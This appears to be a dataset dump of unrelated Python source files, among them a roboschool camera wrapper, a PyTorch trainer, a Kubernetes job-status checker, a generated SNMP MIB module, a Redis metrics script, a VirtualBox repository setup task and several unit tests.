content
stringlengths 5
1.05M
|
|---|
# -----------------------------------------------------------------------------
# @author:
# Tingwu Wang
# @brief:
# The environment wrapper for the depth environment of roboschool
# -----------------------------------------------------------------------------
from mbbl.config import init_path
from mbbl.env import env_util
from mbbl.env import base_env_wrapper
from mbbl.env import env_register
import numpy as np
from pyquaternion import Quaternion
class env(base_env_wrapper.base_env):
def __init__(self, env_name, rand_seed, misc_info):
super(env, self).__init__(env_name, rand_seed, misc_info)
self._base_path = init_path.get_abs_base_dir()
self._VIDEO_H = 100
self._VIDEO_W = 150
if 'width' in misc_info:
self._VIDEO_W = misc_info['video_width']
if 'height' in misc_info:
self._VIDEO_H = misc_info['video_height']
def step(self, action):
# get the observation
ob, reward, _, info = self._env.step(action)
info.update(self._get_rgbd_image())
# get the end signal
self._current_step += 1
info['current_step'] = self._current_step
if self._current_step >= self._env_info['max_length']:
done = True
else:
done = False
return ob, reward, done, info
def reset(self):
self._current_step = 0
self._env.env.VIDEO_H = self._VIDEO_H
self._env.env.VIDEO_W = self._VIDEO_W
return self._env.reset(), 0, False, self._get_rgbd_image()
def _build_env(self):
import gym, roboschool
self._env_info = env_register.get_env_info(self._env_name)
self._VIDEO_H, self._VIDEO_W = \
self._env_info['image_height'], self._env_info['image_width']
roboschool_env_name = self._env_name.split('-')
roboschool_env_name = \
roboschool_env_name[0] + '-' + roboschool_env_name[1]
self._env = gym.make(roboschool_env_name)
def _get_rgbd_image(self):
image_info = {}
if self._env_info['depth']:
self._camera_adjust()
rgb, depth, depth_mask, _, _ = \
self._env.env.camera.render(True, False, False)
rendered_rgb = np.fromstring(rgb, dtype=np.uint8).reshape(
(self._VIDEO_H, self._VIDEO_W, 3)
)
rendered_depth = np.fromstring(depth, dtype=np.float32).reshape(
(int(self._VIDEO_H / 2), int(self._VIDEO_W / 2))
)
image_info['depth'] = rendered_depth
image_info['rgb'] = rendered_rgb
elif self._env_info['rgb']:
self._camera_adjust()
rgb, _, _, _, _ = self._env.env.camera.render(False, False, False)
rendered_rgb = np.fromstring(rgb, dtype=np.uint8).reshape(
(self._VIDEO_H, self._VIDEO_W, 3)
)
image_info['rgb'] = rendered_rgb
return image_info
def _camera_adjust(self):
if 'RoboschoolHumanoid' in self._env_name:
camera = self._env.env.camera
'''
root_quat = self._env.env.robot_body.pose().quatertion()
rotation = Quaternion(root_quat[0], root_quat[1],
root_quat[2], root_quat[3]).rotation_matrix
'''
root_xyz = self._env.env.robot_body.pose().xyz()
# (-1, 0, 0) for the running direction (1, 0, 0)
# (0, 1, 0) --> (0, 1, 0)
# (0, 0, 1) --> (0, 0, 1)
camera_location = root_xyz + \
np.array([0, 0, 0.20]) + np.array([0.4, 0, 0])
look_at_vec = np.array([0.4, 0, -1]) + camera_location
self._env.env.camera_adjust()
camera.set_hfov(100.0)
camera.move_and_look_at(
camera_location[0], camera_location[1], camera_location[2],
look_at_vec[0], look_at_vec[1], look_at_vec[2]
)
elif 'RoboschoolAnt' in self._env_name:
camera = self._env.env.camera
root_quat = self._env.env.robot_body.pose().quatertion()
root_xyz = self._env.env.robot_body.pose().xyz()
# (-1, 0, 0) for the running direction (1, 0, 0)
# (0, 1, 0) --> (0, 1, 0)
# (0, 0, 1) --> (0, 0, 1)
camera_location = root_xyz + \
np.array([-1, 0, 1])
look_at_vec = root_xyz
self._env.env.camera_adjust()
camera.move_and_look_at(
camera_location[0], camera_location[1], camera_location[2],
look_at_vec[0], look_at_vec[1], look_at_vec[2]
)
else:
self._env.env.camera_adjust()
if __name__ == '__main__':
# test the function
import matplotlib.pyplot as plt
test_type = 'rgb'
test_type = 'depth'
if test_type == 'rgb':
test_env = env('RoboschoolHumanoidFlagrunHarder-v1-rgb', 1234, {})
ob, reward, done, info = test_env.reset()
for _ in range(100):
plt.imshow(info['rgb'])
plt.show()
ob, reward, done, info = test_env.step(np.random.randn(17))
# import pdb; pdb.set_trace()
elif test_type == 'depth':
# test_env = env('RoboschoolHumanoidFlagrunHarder-v1-rgbd', 1234, {})
test_env = env('RoboschoolHumanoid-v1-rgbd', 1234, {})
# test_env = env('RoboschoolAnt-v1-rgbd', 1234, {})
ob, reward, done, info = test_env.reset()
for _ in range(100):
plt.imshow(info['depth'], cmap='gray', vmin=-1, vmax=1.0)
print(info['depth'])
plt.show()
ob, reward, done, info = test_env.step(np.random.randn(17))
|
import numpy as np
import utils_driving as utils
import theano as th
import theano.tensor as tt
from trajectory import Trajectory
import feature
class Car(object):
def __init__(self, dyn, x0, color='yellow', T=5):
self.data0 = {'x0': x0}
self.bounds = [(-1., 1.), (-1., 1.)]
self.T = T
self.dyn = dyn
self.traj = Trajectory(T, dyn)
self.traj.x0.set_value(x0)
self.linear = Trajectory(T, dyn)
self.linear.x0.set_value(x0)
self.color = color
self.default_u = np.zeros(self.dyn.nu)
def reset(self):
self.traj.x0.set_value(self.data0['x0'])
self.linear.x0.set_value(self.data0['x0'])
for t in range(self.T):
self.traj.u[t].set_value(np.zeros(self.dyn.nu))
self.linear.u[t].set_value(self.default_u)
def move(self):
self.traj.tick()
self.linear.x0.set_value(self.traj.x0.get_value())
@property
def x(self):
return self.traj.x0.get_value()
@x.setter
def x(self, value):
self.traj.x0.set_value(value)
@property
def u(self):
return self.traj.u[0].get_value()
@u.setter
def u(self, value):
self.traj.u[0].set_value(value)
def control(self, steer, gas):
pass
|
from django.contrib import admin
from .models import Event, Contact, EventImage
# Register your models here.
class EventImageInline(admin.TabularInline):
model = EventImage
extra = 3
class EventAdmin(admin.ModelAdmin):
inlines = [ EventImageInline, ]
admin.site.register(Event, EventAdmin)
admin.site.register(Contact)
admin.site.site_header = "Elea Africa Backend"
|
"""Trainer Class"""
from pathlib import Path
from tqdm import tqdm
import torch
import torch.nn as nn
from tensorboardX import SummaryWriter
from utils.logger import get_logger
LOG = get_logger(__name__)
class Trainer:
def __init__(self, **kwargs):
self.device = kwargs['device']
self.model = kwargs['model']
self.trainloader, self.testloader = kwargs['dataloaders']
self.epochs = kwargs['epochs']
self.optimizer = kwargs['optimizer']
self.criterion = kwargs['criterion']
self.metric = kwargs['metrics']
self.save_ckpt_interval = kwargs['save_ckpt_interval']
self.ckpt_dir = kwargs['ckpt_dir']
self.writer = SummaryWriter(str(kwargs['summary_dir']))
def train(self):
best_acc = 0.0
for epoch in range(self.epochs):
LOG.info(f'\n==================== Epoch: {epoch} ====================')
LOG.info('\n Train:')
self.model.train()
with tqdm(self.trainloader, ncols=100) as pbar:
for idx, (inputs, targets) in enumerate(pbar):
inputs = inputs.to(self.device)
targets = targets.to(self.device)
outputs = self.model(inputs)
loss = self.criterion(outputs, targets)
loss.backward()
self.optimizer.step()
self.optimizer.zero_grad()
preds = outputs.argmax(axis=1)
self.metric.update(preds=preds.cpu().detach().clone(),
targets=targets.cpu().detach().clone(),
loss=loss.item())
pbar.set_description(f'train epoch:{epoch}')
self.metric.result(epoch, mode='train')
self._write_summary(epoch, mode='train')
self.metric.reset_states()
# eval
eval_acc = self.eval(epoch)
# save ckpt
if epoch != 0 and epoch % self.save_ckpt_interval == 0:
LOG.info(' Saving Checkpoint...')
self._save_ckpt(epoch)
# save best ckpt
if eval_acc > best_acc:
best_acc = eval_acc
self._save_ckpt(epoch, mode='best')
def eval(self, epoch: int = 0) -> float:
self.model.eval()
LOG.info('\n Evaluation:')
with torch.no_grad():
with tqdm(self.testloader, ncols=100) as pbar:
for idx, (inputs, targets) in enumerate(pbar):
inputs = inputs.to(self.device)
targets = targets.to(self.device)
outputs = self.model(inputs)
loss = self.criterion(outputs, targets)
self.optimizer.zero_grad()
preds = outputs.argmax(axis=1)
self.metric.update(preds=preds.cpu().detach().clone(),
targets=targets.cpu().detach().clone(),
loss=loss.item())
pbar.set_description(f'eval epoch: {epoch}')
self.metric.result(epoch, mode='eval')
self._write_summary(epoch, mode='eval')
eval_acc = self.metric.acc
self.metric.reset_states()
return eval_acc
def _write_summary(self, epoch: int, mode: str):
# Change mode from 'eval' to 'val' to change the display order from left to right to train and eval.
mode = 'val' if mode == 'eval' else mode
self.writer.add_scalar(f'loss/{mode}', self.metric.loss, epoch)
self.writer.add_scalar(f'accuracy/{mode}', self.metric.acc, epoch)
self.writer.add_scalar(f'mean_f1score/{mode}', self.metric.f1score.mean(), epoch)
self.writer.add_scalar(f'precision/{mode}', self.metric.precision.mean(), epoch)
self.writer.add_scalar(f'recall/{mode}', self.metric.recall.mean(), epoch)
def _save_ckpt(self, epoch, mode=None, zfill=4):
if isinstance(self.model, nn.DataParallel):
model = self.model.module
else:
model = self.model
if mode == 'best':
ckpt_path = self.ckpt_dir / 'best_acc_ckpt.pth'
else:
ckpt_path = self.ckpt_dir / f'epoch{str(epoch).zfill(zfill)}_ckpt.pth'
torch.save({
'epoch': epoch,
'model': model,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': self.optimizer.state_dict(),
}, ckpt_path)
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import google
from google.cloud import container_v1
import google.auth
import google.auth.transport.requests
import kubernetes
from tempfile import NamedTemporaryFile
import time
import util
DOES_NOT_EXIST = 'does_not_exist'
UNKNOWN_STATUS = 'unknown'
SUCCESS = 'success'
FAILURE = 'failure'
TIMEOUT = 'timeout'
class JobStatusHandler(object):
def __init__(self, project_id, zone, cluster_name, logger):
"""Query Kubernetes API to retrieve the status of Kubernetes Jobs.
Args:
project_id (string): Name of the Cloud project under which the
Kubernetes Job(s) ran.
zone (string): Zone where the Kubernetes Job(s) ran.
cluster_name (string): Name of the Kubernetes cluster where the
Job(s) ran. Corresponds to the `cluster-name` attribute in GCP.
logger (`AlertHandler` instance): Used to write logs and alert emails.
Raises:
Exception if unable to initialize the Kubernetes client.
"""
self.project_id = project_id
self.zone = zone
self.cluster_name = cluster_name
self.logger = logger
self.k8s_client = None
def _init_k8s_client(self):
# Attempt to initialize a Kubernetes client to retrieve Job statuses.
# Different methods are used depending on where this code runs.
try:
# This method is used when there is no local kubeconfig file, e.g.
# running this code within a Cloud Function. For local runs, you can
# use this path by running `gcloud auth application-default login`.
self.logger.info('Attempting to init k8s client from cluster response.')
container_client = container_v1.ClusterManagerClient()
# Try zonal cluster first, then try regional.
try:
cluster_path = "projects/{}/locations/{}/clusters/{}".format(
self.project_id, self.zone, self.cluster_name)
response = container_client.get_cluster(
None, None, None, name=cluster_path)
self.location = self.zone
except google.api_core.exceptions.NotFound:
self.logger.warning('No zonal cluster found for {}. Trying regional.'.format(cluster_path))
# TODO: include this in message instead
region = self.zone[:-2]
cluster_path = "projects/{}/locations/{}/clusters/{}".format(
self.project_id, region, self.cluster_name)
response = container_client.get_cluster(
None, None, None, name=cluster_path)
self.location = region
creds, projects = google.auth.default()
auth_req = google.auth.transport.requests.Request()
creds.refresh(auth_req)
configuration = kubernetes.client.Configuration()
configuration.host = f'https://{response.endpoint}'
with NamedTemporaryFile(delete=False) as ca_cert:
ca_cert.write(
base64.b64decode(response.master_auth.cluster_ca_certificate))
configuration.ssl_ca_cert = ca_cert.name
configuration.api_key_prefix['authorization'] = 'Bearer'
configuration.api_key['authorization'] = creds.token
self.k8s_client = kubernetes.client.BatchV1Api(
kubernetes.client.ApiClient(configuration))
self.logger.info('Successful init of k8s client from cluster response.')
except Exception as e1:
# This method is generally used for local runs where the user has already
# ran `gcloud container clusters get-credentials` to get a kubeconfig.
self.logger.warning(
'Failed to load k8s client from cluster response: {}. '
'Falling back to local kubeconfig file.'.format(e1))
try:
kubernetes.config.load_kube_config()
self.k8s_client = kubernetes.client.BatchV1Api()
self.logger.info(
'Successful init of k8s client from local kubeconfig file.')
except Exception as e2:
self.logger.fatal(
'Failed both methods of loading k8s client. Error for '
'cluster response method: {}. Error for local '
'kubeconfig file: {}. No job status will be '
'collected.'.format(e1, e2))
raise
def _query_for_status(self, job_name, namespace):
if not self.k8s_client:
self._init_k8s_client()
try:
status = self.k8s_client.read_namespaced_job(
job_name, namespace).status
except Exception as e:
if isinstance(e, kubernetes.client.rest.ApiException) and \
e.status == 404:
self.logger.warning(
'Job with job_name: {} no longer exists in namespace: '
'{}. Error was: {}'.format(job_name, namespace, e))
return DOES_NOT_EXIST, None
else:
self.logger.error(
'Failed to get job status for job_name: {} and '
'namespace: {}. Error was: {}'.format(
job_name, namespace, e))
return FAILURE, None
return SUCCESS, status
def workload_link(self, job_name, job_namespace):
"""Build a link to the Kubernetes workload for a specific test run.
Args:
job_name (string): Name of the Kubernetes job. Should include the
timestamp, e.g. 'pt-1.5-resnet-func-v3-8-1584453600'.
job_namespace (string): Name of the Kubernetes namespace.
location (string): GCP zone or region, e.g. 'us-central1-b'.
Returns:
link (string): A link to the Kubernetes workload page for this job.
"""
if not self.location:
self._init_k8s_client()
return util.workload_link(
job_name, job_namespace, self.location, self.cluster_name, self.project_id)
def interpret_status(self, status, job_name):
"""Interprets the status of a Kubernetes job.
Args:
status (Status): Return value of e.g. `read_namespaced_job_status`.
job_name (string): Name of the job to use in logging.
Returns:
completion_code (string): State that the Job ended in.
stop_time (timestamp): Time at which the Job completed or fully failed.
num_failures (int): Number of unsuccessful attempts of this Job.
"""
self.logger.info('job_name: {}. status: {}'.format(job_name, status))
if status.active:
self.logger.warning('Job is still active. Returning UNKNOWN_STATUS.')
return UNKNOWN_STATUS, None, None
completion_code = UNKNOWN_STATUS
if status.succeeded:
completion_code = SUCCESS
if status.completion_time:
stop_time = status.completion_time.timestamp()
else:
if status.conditions and len(status.conditions) == 1 and \
status.conditions[0].last_transition_time:
stop_time = status.conditions[0].last_transition_time.timestamp()
self.logger.error(
'No completion_time in success status for job: {}. Using '
'last_transition_time. Status: {}'.format(job_name, status))
else:
self.logger.error(
'No completion_time or transition time in success status for '
'job: {}. Using time.time(). Status: {}'.format(job_name, status))
stop_time = time.time()
else:
if not status.conditions or len(status.conditions) != 1:
self.logger.warning(
'Expected exactly 1 `condition` element in non-success status. '
'Will retry later. Status was: {}.'.format(status))
completion_code = DOES_NOT_EXIST
stop_time = time.time()
else:
completion_code = TIMEOUT if \
status.conditions[0].reason == 'DeadlineExceeded' else FAILURE
stop_time = status.conditions[0].last_transition_time.timestamp()
num_failures = status.failed or 0
return completion_code, stop_time, num_failures
def get_job_status(self, job_name, namespace):
"""Returns key information about the status of a Kubernetes Job.
Args:
job_name (string): Name of the job.
namespace (string): Name of the Kubernetes namespace where the job ran.
Returns:
completion_code (string): The current status of the Job.
stop_time (timestamp): Time at which the Job completed or fully failed.
num_failures (int): Number of unsuccessful attempts of this Job.
"""
retrieval_status, status = self._query_for_status(job_name, namespace)
if retrieval_status == DOES_NOT_EXIST:
return DOES_NOT_EXIST, None, None
elif retrieval_status == FAILURE:
return UNKNOWN_STATUS, None, None
completion_code, stop_time, num_failures = self.interpret_status(
status, job_name)
return completion_code, stop_time, num_failures
|
'''
***********************************************************************************************************************
* Main process file solar estimation tool *
* Created by P.Nezval *
* version 0.1 *
* May 2021 - August 2021 *
***********************************************************************************************************************
License:
MIT License
==================================
'''
from det_tool.process import main
######################################################################################################################
if __name__ == "__main__":
main()
|
from genericpath import isfile
import unittest
from moonboard import MoonBoard, get_moonboard
# class BaseAPITestClass(unittest.TestCase):
# """
# BaseClass for testing
# """
# def setUp(self):
# """
# Set up method that will run before every test
# """
# pass
# def tearDown(self):
# """
# Tear down method that will run after every test
# """
# pass
class MoonboardTests(unittest.TestCase):
def test_equal_moonboards(self):
"""
Test that two MoonBoard objects with the same parameters are equal
"""
# Given
year = 2017
# When
m1 = get_moonboard(year)
m2 = get_moonboard(year)
# Then
self.assertEqual(m1, m2)
def test_get_valid_moonboard(self):
"""
Test that a valid moon year returns a MoonBoard object
"""
# Given
year = [2016, 2017, 2019] # Valid moon year layouts
# When
moonboards = [get_moonboard(y) for y in year]
# Then
self.assertTrue(all([isinstance(mb, MoonBoard) for mb in moonboards]))
self.assertTrue(
all([mb.get_year_layout() in year for mb in moonboards]))
self.assertTrue(all([mb.get_cols() == 11 for mb in moonboards]))
self.assertTrue(all([mb.get_rows() == 18 for mb in moonboards]))
self.assertTrue(all([isfile(mb.get_image()) for mb in moonboards]))
def test_get_invalid_moonboard(self):
"""
Test that an invalid moon year raises an error
"""
# Given
year = 2015 # Invalid moon year layout
# When
with self.assertRaises(ValueError) as context:
get_moonboard(year)
# Then
self.assertTrue(
'Invalid year' in str(context.exception)
) # Test error message?
self.assertRaises(ValueError, get_moonboard, year)
class GeneratorsTests(unittest.TestCase):
def test_empy_generator(self):
"""
Test that an empty generator raises a NotImplementedError when
generate() is called
"""
# Given
from generators.base_generator import BaseGenerator
# When
class EmptyGen(BaseGenerator):
pass
gen = EmptyGen()
# Then
with self.assertRaises(NotImplementedError) as context:
gen.generate()
def test_ahoughton_generator(self):
"""
Test that the Ahoughton generator returns a valid MoonBoard problem
"""
# Given
from generators.ahoughton import AhoughtonGenerator
a_gen = AhoughtonGenerator()
# When
problem = a_gen.generate()
# Then
self.assertTrue('18' in problem[0]) # assert climb ends at top row
# assert climb starts at bottom rows
self.assertTrue(problem[-1][-1] in '6543') # This fails sometimes
self.assertTrue(len(problem) > 2) # assert there are more than 2 moves
if __name__ == '__main__':
unittest.main()
|
import logging
import concurrent.futures
from EOSS.critic.critic import Critic
from EOSS.models import EOSSContext
logger = logging.getLogger('EOSS.critic')
def general_call(design_id, designs, session_key, context):
eosscontext = EOSSContext.objects.get(id=context["screen"]["id"])
critic = Critic(eosscontext.user_information, session_key)
# print("Critizing arch ", design_id,"in",designs)
try:
this_design = find_design_by_id(designs, design_id)
if this_design is None:
raise ValueError("Design id {} not found in the database".format(design_id))
critic_results = []
with concurrent.futures.ThreadPoolExecutor() as executor:
# Criticize architecture (based on rules)
expert_results = executor.submit(critic.expert_critic, this_design)
# Criticize architecture (based on explorer)
explorer_results = executor.submit(critic.explorer_critic, this_design)
# Criticize architecture (based on database)
# TODO: Fix issues with new Database system matching the inputs to historian (NLP work)
# historian_results = executor.submit(critic.historian_critic, this_design)
# Criticize architecture (based on data mining)
analyst_results = executor.submit(critic.analyst_critic, this_design)
critic_results.extend(expert_results.result())
critic_results.extend(explorer_results.result())
#critic_results.extend(historian_results.result())
critic_results.extend(analyst_results.result())
# Send response
return critic_results
except Exception:
logger.exception('Exception in criticizing the architecture')
return None
def find_design_by_id(design_set, design_id):
for design in design_set:
if design["id"] == design_id:
return design
def specific_call(design_id, agent, designs, session_key, context):
eosscontext = EOSSContext.objects.get(id=context["screen"]["id"])
critic = Critic(eosscontext, session_key)
try:
result = []
result_arr = []
this_design = designs.get(id=design_id)
if this_design is None:
raise ValueError("Design id {} not found in the database".format(design_id))
if agent == 'expert':
# Criticize architecture (based on rules)
result_arr = critic.expert_critic(this_design)
elif agent == 'historian':
# Criticize architecture (based on database)
result_arr = critic.historian_critic(this_design)
elif agent == 'analyst':
# Criticize architecture (based on database)
result_arr = critic.analyst_critic(this_design)
elif agent == 'explorer':
# Criticize architecture (based on database)
result_arr = critic.explorer_critic(this_design)
# Send response
return result_arr
except Exception:
logger.exception('Exception in using a single agent to criticize the architecture')
return None
|
#
# PySNMP MIB module CXACTE-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CXACTE-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 18:16:28 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "Integer", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsIntersection, ValueRangeConstraint, ValueSizeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsIntersection", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsUnion")
cxACTE, = mibBuilder.importSymbols("CXProduct-SMI", "cxACTE")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Gauge32, Counter64, IpAddress, MibIdentifier, ModuleIdentity, iso, ObjectIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks, NotificationType, Bits, Integer32, Unsigned32, Counter32 = mibBuilder.importSymbols("SNMPv2-SMI", "Gauge32", "Counter64", "IpAddress", "MibIdentifier", "ModuleIdentity", "iso", "ObjectIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "TimeTicks", "NotificationType", "Bits", "Integer32", "Unsigned32", "Counter32")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
acteDebugTable = MibTable((1, 3, 6, 1, 4, 1, 495, 2, 1, 8, 1, 30), )
if mibBuilder.loadTexts: acteDebugTable.setStatus('mandatory')
acteDebugEntry = MibTableRow((1, 3, 6, 1, 4, 1, 495, 2, 1, 8, 1, 30, 1), ).setIndexNames((0, "CXACTE-MIB", "acteDebugLinkIndex"), (0, "CXACTE-MIB", "acteDebugIndex"))
if mibBuilder.loadTexts: acteDebugEntry.setStatus('mandatory')
acteDebugLinkIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 495, 2, 1, 8, 1, 30, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2))).setMaxAccess("readonly")
if mibBuilder.loadTexts: acteDebugLinkIndex.setStatus('mandatory')
acteDebugIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 495, 2, 1, 8, 1, 30, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 31))).setMaxAccess("readonly")
if mibBuilder.loadTexts: acteDebugIndex.setStatus('mandatory')
acteDebugRegister = MibTableColumn((1, 3, 6, 1, 4, 1, 495, 2, 1, 8, 1, 30, 1, 10), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 5))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: acteDebugRegister.setStatus('mandatory')
acteDebugResult = MibTableColumn((1, 3, 6, 1, 4, 1, 495, 2, 1, 8, 1, 30, 1, 50), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 25))).setMaxAccess("readonly")
if mibBuilder.loadTexts: acteDebugResult.setStatus('mandatory')
acteDebugWrite = MibTableColumn((1, 3, 6, 1, 4, 1, 495, 2, 1, 8, 1, 30, 1, 80), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 2))).setMaxAccess("writeonly")
if mibBuilder.loadTexts: acteDebugWrite.setStatus('mandatory')
acteDebugTvdStat = MibTableColumn((1, 3, 6, 1, 4, 1, 495, 2, 1, 8, 1, 30, 1, 81), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 3))).setMaxAccess("writeonly")
if mibBuilder.loadTexts: acteDebugTvdStat.setStatus('mandatory')
acteDebugDs1Stat = MibTableColumn((1, 3, 6, 1, 4, 1, 495, 2, 1, 8, 1, 30, 1, 82), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 3))).setMaxAccess("writeonly")
if mibBuilder.loadTexts: acteDebugDs1Stat.setStatus('mandatory')
acteDebugSvdStat = MibTableColumn((1, 3, 6, 1, 4, 1, 495, 2, 1, 8, 1, 30, 1, 83), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 3))).setMaxAccess("writeonly")
if mibBuilder.loadTexts: acteDebugSvdStat.setStatus('mandatory')
acteDebugSvdEvt = MibTableColumn((1, 3, 6, 1, 4, 1, 495, 2, 1, 8, 1, 30, 1, 84), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 3))).setMaxAccess("writeonly")
if mibBuilder.loadTexts: acteDebugSvdEvt.setStatus('mandatory')
mibBuilder.exportSymbols("CXACTE-MIB", acteDebugDs1Stat=acteDebugDs1Stat, acteDebugLinkIndex=acteDebugLinkIndex, acteDebugIndex=acteDebugIndex, acteDebugSvdStat=acteDebugSvdStat, acteDebugWrite=acteDebugWrite, acteDebugRegister=acteDebugRegister, acteDebugResult=acteDebugResult, acteDebugTvdStat=acteDebugTvdStat, acteDebugTable=acteDebugTable, acteDebugEntry=acteDebugEntry, acteDebugSvdEvt=acteDebugSvdEvt)
|
def extractWwwSigmanovelCom(item):
'''
Parser for 'www.sigmanovel.com'
'''
if 'Teasers' in item['tags']:
return None
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('Martial God Conquerer', 'Martial God Conquerer', 'translated'),
('World Controlling God', 'World Controlling God', 'translated'),
('Above The Skies', 'Above The Skies', 'translated'),
('Sage Emperor', 'Sage Emperor', 'translated'),
('The Mysterious Apartment', 'The Mysterious Apartment', 'translated'),
('Rebirth in a Perfect Era', 'Rebirth in a Perfect Era', 'translated'),
('Immortal', 'Immortal', 'translated'),
('Great Tyrannical Deity', 'Great Tyrannical Deity', 'translated'),
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False
|
#!/usr/bin/env python
"""igcollect - Redis Keys
Copyright (c) 2017 InnoGames GmbH
"""
import redis
from argparse import ArgumentParser
from subprocess import Popen, PIPE
from time import time
def parse_args():
parser = ArgumentParser()
parser.add_argument('--prefix', default='redis')
parser.add_argument('--redis_host', default='localhost')
parser.add_argument('--redis_port', default='6379')
parser.add_argument('--command', default='llen')
parser.add_argument('--keys', default='*queue*')
return parser.parse_args()
def main():
args = parse_args()
template = args.prefix + '.{}.{} {} ' + str(int(time()))
redis_db = redis.StrictRedis(
host=args.redis_host, port=args.redis_port, db=0)
for key in redis_db.keys(args.keys):
data = redis_db.execute_command(args.command, key)
print(template.format(key, args.command, data))
if __name__ == '__main__':
main()
|
from __future__ import print_function
from burlap import Satchel
from burlap.constants import *
from burlap.decorators import task
#http://askubuntu.com/a/555366/13217
class VirtualboxSatchel(Satchel):
name = 'virtualbox'
@task(precursors=['packager'])
def configure(self):
"""
Enables the repository for a most current version on Debian systems.
https://www.rabbitmq.com/install-debian.html
"""
os_version = self.os_version
if not self.dryrun and os_version.distro != UBUNTU:
raise NotImplementedError("OS %s is not supported." % os_version)
r = self.local_renderer
r.env.codename = (r.run('lsb_release -c -s') or "`lsb_release -c -s`").strip()
r.sudo('apt-add-repository "deb http://download.virtualbox.org/virtualbox/debian {codename} contrib"')
r.sudo('cd /tmp; wget -q https://www.virtualbox.org/download/oracle_vbox.asc -O- | sudo apt-key add -')
r.sudo('apt-get update')
virtualbox = VirtualboxSatchel()
|
import os
import signal
class SignalHandler(object):
"""Class to detect OS signals
e.g. detect when CTRL+C is pressed and issue a callback
"""
def __init__(self, sig=signal.SIGINT, callback=None, resignal_on_exit=False):
self.sig = sig
self.interrupted = False
self.released = False
self.original_handler = None
self.resignal_on_exit = resignal_on_exit
self.callback = callback
def __enter__(self):
self.interrupted = False
self.released = False
self.original_handler = signal.getsignal(self.sig)
def _handler(signum, frame):
forward_signal = False
if not self.interrupted:
if self.callback:
try:
forward_signal = self.callback() == 'forward-signal'
except:
pass
self.interrupted = True
self.release()
if forward_signal:
self.original_handler()
signal.signal(self.sig, _handler)
return self
def __exit__(self, t, value, tb):
self.release()
if self.interrupted and self.resignal_on_exit:
os.kill(os.getpid(), self.sig)
def release(self):
if self.released:
return False
signal.signal(self.sig, self.original_handler)
self.released = True
return True
|
from django.views.generic import ListView
from django.shortcuts import render
from django.http import HttpResponse
from blog.views import CommonViewMinxin
from .models import Link
class LinkListView(CommonViewMinxin, ListView):
queryset = Link.objects.filter(status=Link.STATUS_NORMAL)
template_name = 'config/links.html'
context_object_name = 'link_list'
|
from typing import List
import probflow.utils.ops as O
from probflow.distributions import Normal
from probflow.models import ContinuousModel
from probflow.modules import DenseNetwork
from probflow.parameters import ScaleParameter
from probflow.utils.casting import to_tensor
class DenseRegression(ContinuousModel):
r"""A regression using a multilayer dense neural network
TODO: explain, math, diagram, examples, etc
Parameters
----------
d : List[int]
Dimensionality (number of units) for each layer.
The first element should be the dimensionality of the independent
variable (number of features), and the last element should be the
dimensionality of the dependent variable (number of dimensions of the
target).
heteroscedastic : bool
Whether to model a change in noise as a function of :math:`\mathbf{x}`
(if ``heteroscedastic=True``), or not (if ``heteroscedastic=False``,
the default).
activation : callable
Activation function to apply to the outputs of each layer.
Note that the activation function will not be applied to the outputs
of the final layer.
Default = :math:`\max ( 0, x )`
kwargs
Additional keyword arguments are passed to :class:`.DenseNetwork`
Attributes
----------
network : :class:`.DenseNetwork`
The multilayer dense neural network which generates predictions of the
mean
std : :class:`.ScaleParameter`
Standard deviation of the Normal observation distribution
"""
def __init__(self, d: List[int], heteroscedastic: bool = False, **kwargs):
self.heteroscedastic = heteroscedastic
if heteroscedastic:
self.d_out = d[-1]
d[-1] = 2 * d[-1]
self.network = DenseNetwork(d, **kwargs)
else:
self.network = DenseNetwork(d, **kwargs)
self.std = ScaleParameter([1, d[-1]], name="std")
def __call__(self, x):
x = to_tensor(x)
if self.heteroscedastic:
p = self.network(x)
m_preds = p[..., :, : self.d_out]
s_preds = O.exp(p[..., :, self.d_out :])
return Normal(m_preds, s_preds)
else:
return Normal(self.network(x), self.std())
|
import pytest
from houston.configuration import Configuration, option
def test_option_construction():
class X(Configuration):
foo = option(int)
